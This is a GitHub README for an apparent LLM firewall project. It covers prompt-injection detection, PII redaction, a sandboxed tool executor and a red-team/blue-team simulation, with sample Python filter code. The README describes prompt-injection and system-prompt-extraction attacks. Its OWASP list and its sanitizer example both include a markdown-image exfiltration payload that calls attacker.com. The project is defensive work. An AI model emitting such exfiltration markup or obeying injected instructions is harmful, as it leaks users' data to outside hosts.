mulugumanishkumar2006-del/secure-ai-firewall-system

GitHub: mulugumanishkumar2006-del/secure-ai-firewall-system

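A production-grade AI firewall framework that protects LLM systems through a multi-stage security gateway, providing prompt injection defense, PII masking, policy enforcement, and red team/blue team adversarial testing.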

Stars: 0 | Forks: 0

# Secure AI Firewall System

A production-grade, enterprise-grade **secure AI assistant and firewall system** written in Python 3.12. It demonstrates advanced large language model (LLM) security techniques, real-time threat detection, output sanitization, and secure agentic tool execution, each mapped to the **OWASP Top 10 LLM security risks** it mitigates.

## System Architecture and Defense in Depth

The architecture intercepts all input and output through a multi-stage security gateway:

```
                          [ User Prompt ]
                                 │
                                 ▼
┌─────────────────────────────────────────────────────────────────┐
│ 1. LLM GATEWAY (PRE-PROCESS)                                    │
│  - PII Detection: Emails, Aadhaar, Credit Cards, Secrets        │
│  - Prompt Injection Scanner: Keyword matching, Structural tags  │
│  - Policy Engine: ALLOW/BLOCK category rules                    │
│  - Threat Classifier: Categorizes into SAFE/SUSPICIOUS/MALICIOUS│
└────────────────────────────────┬────────────────────────────────┘
                                 │
                       [ Safe / Suspicious ]
                                 │
                                 ▼
┌─────────────────────────────────────────────────────────────────┐
│ 2. SECURE WRAPPED AGENT                                         │
│  - XML tag framing & Sandwich prompt context shielding          │
│  - Simulated vulnerable LLM (obeying jailbreaks if exposed)     │
└────────────────────────────────┬────────────────────────────────┘
                                 │
                   [ Optional Tool Call Signal ]
                                 │
                                 ▼
┌─────────────────────────────────────────────────────────────────┐
│ 3. SANDBOXED TOOL EXECUTOR                                      │
│  - Strict CLI command injection regex checks                    │
│  - Directory containment checks (blocks path traversal)         │
│  - Strict Allowed Tools whitelist policy                        │
└────────────────────────────────┬────────────────────────────────┘
                                 │
                        [ Raw LLM Output ]
                                 │
                                 ▼
┌─────────────────────────────────────────────────────────────────┐
│ 4. GATEWAY FILTER (POST-PROCESS)                                │
│  - PII Leakage Check & Redaction                                │
│  - Exfiltration Block: Strip markdown images & external URLs    │
│  - System Prompt Leakage Protection: Catch extraction attempts  │
└────────────────────────────────┬────────────────────────────────┘
                                 │
                                 ▼
                       [ Sanitized Output ]
```

### OWASP LLM Top 10 Mitigations

1. **LLM01: Prompt Injection**: Defended by keyword, structural, and base64 detection in the pre-processor, combined with XML tag framing and the sandwich prompt structure in the Prompt Engine.
2. **LLM02: Insecure Output Handling**: Mitigated by running the Response Filter, which redacts and restricts generated scripts or markdown assets before rendering.
3. **LLM06: Sensitive Information Disclosure (Data Exfiltration)**: Defended by having the Response Filter block automatically triggered external requests (for example, markdown image pixels such as `![exfil](http://attacker.com/leak?data=...)`).
4. **LLM08: Excessive Agency**: Mitigated by restricting tools to an explicit allowlist, checking for shell execution characters, and checking file boundaries to prevent directory traversal.

## File Structure

```
security-ai-system/
│
├── config/
│   └── settings.py                   # Configuration thresholds and allowlists
│
├── core/
│   ├── prompt_engine.py              # Sandbox prompt wraps (Sandwich prompt)
│   ├── tool_executor.py              # Sandboxed math, file, and weather tools
│   ├── response_filter.py            # Exfiltration and system prompt leak blockers
│   └── llm_gateway.py                # Core gateway manager & logger
│
├── security/
│   ├── pii_detector.py               # Regex PII scanner (email, phone, cards, secrets)
│   ├── prompt_injection_detector.py  # Structural, base64 and keyword scanner
│   ├── policy_engine.py              # ALLOW/BLOCK rule evaluator
│   ├── content_filter.py             # Profanity and self-harm scanner
│   └── threat_classifier.py          # Aggregates scores into threat profile
│
├── agents/
│   ├── secure_agent.py               # Stateful chatbot wrapper
│   ├── red_team_agent.py             # Adversarial attack simulator
│   └── blue_team_agent.py            # Log audit and auto-configuration agent
│
├── evaluations/
│   ├── jailbreak_tests.json          # Test case database (threats and benign cases)
│   ├── security_metrics.py           # Calculations for KPI reporting
│   └── attack_tests.py               # Execution runner compiling compliance report
│
├── tests/
│   ├── test_injection.py             # Pytest injection unit tests
│   ├── test_pii_leakage.py           # Pytest PII masking unit tests
│   └── test_policy.py                # Pytest policy engine unit tests
│
├── logs/                             # Storage folder for audit and security logs
├── requirements.txt                  # Project dependencies
├── main.py                           # CLI console launcher
└── README.md                         # Project documentation
```

## Installation and Setup

1. **Prerequisites**: Make sure Python 3.12+ is installed.
2. **Install dependencies**: `pip install -r requirements.txt`

## How to Run

The system offers three operating modes through the `main.py` CLI, plus a Pytest suite:

### 1. Interactive Chat Console (Live Firewall Logs)

Chat with the secure chatbot in real time. You will see live log details, tool executions, and threat alerts.

```
python main.py --mode interactive
```

### 2. Run the Automated Evaluation Suite (Compliance Report)

Runs the firewall against a test database of 15 adversarial and benign scenarios, generates a compliance report at `logs/security_report.md`, and logs summary statistics.

```
python main.py --mode evaluate
```

### 3. Red Team vs Blue Team Attack Simulation

Simulates a multi-agent attack scenario: the red team generates attacks and launches them at the firewall, then the blue team analyzes the logs and suggests configuration changes to improve the policy.

```
python main.py --mode simulation
```

### 4. Run the Pytest Suite

Runs all unit tests for prompt injection, PII masking, and policy evaluation:

```
pytest tests/
```
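
To make the post-processing stage of the gateway (stage 4 in the architecture, covering LLM02 and LLM06) more concrete, here is a minimal sketch of an output filter that strips markdown images and external URLs and redacts email addresses. It is an illustration only: the function name `sanitize_output`, the placeholder strings, and the regex patterns are assumptions made for this example and are not taken from the repository's `response_filter.py`.

```python
import re

# Hypothetical patterns for illustration; the project's own filter may differ.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")       # ![alt](target)
EXTERNAL_URL = re.compile(r"https?://[^\s)>\]]+")    # bare http(s) links
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def sanitize_output(text: str) -> str:
    """Return text with markdown images, emails, and external URLs removed.

    Images are stripped first so that a tracking-pixel URL embedded in an
    image tag disappears together with the tag itself.
    """
    text = MD_IMAGE.sub("[image removed]", text)
    text = EMAIL.sub("[REDACTED_EMAIL]", text)
    text = EXTERNAL_URL.sub("[link removed]", text)
    return text


if __name__ == "__main__":
    raw = "Done. ![exfil](http://attacker.com/leak?data=abc) Contact bob@example.com"
    print(sanitize_output(raw))
```

Removing the whole image tag, rather than only the URL inside it, avoids leaving a broken image reference that a renderer might still try to resolve.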
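
The sandboxed tool executor checks (stage 3 in the architecture, covering LLM08) can be sketched in a similar way. The example below shows one possible form of a tool allowlist, a shell metacharacter check, and a directory containment check. All names here (`ALLOWED_TOOLS`, `SANDBOX_ROOT`, `is_tool_allowed`, `has_shell_metachars`, `resolve_in_sandbox`) are hypothetical and chosen for this sketch; the repository's `tool_executor.py` may be organized differently.

```python
import re
from pathlib import Path

# Hypothetical configuration values, assumed for this example only.
ALLOWED_TOOLS = {"calculator", "read_file", "weather"}
SANDBOX_ROOT = Path("sandbox").resolve()
SHELL_METACHARS = re.compile(r"[;&|`$<>]")


def is_tool_allowed(name: str) -> bool:
    """Only tools on the explicit allowlist may run."""
    return name in ALLOWED_TOOLS


def has_shell_metachars(argument: str) -> bool:
    """Flag characters commonly used to chain or substitute shell commands."""
    return SHELL_METACHARS.search(argument) is not None


def resolve_in_sandbox(user_path: str, root: Path = SANDBOX_ROOT) -> Path:
    """Resolve user_path under root and reject anything that escapes it."""
    candidate = (root / user_path).resolve()
    try:
        candidate.relative_to(root)  # raises ValueError if outside root
    except ValueError:
        raise PermissionError(f"path escapes sandbox: {user_path!r}") from None
    return candidate
```

Resolving the path before comparing it to the sandbox root matters here: a plain string prefix check would accept inputs such as `notes/../../secret.txt`, while the resolved form exposes the traversal.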

Tags: AI security, Chat Copilot, DLL hijacking, LLM firewall, Python, large language models, prompt injection protection, document structure analysis, no backdoor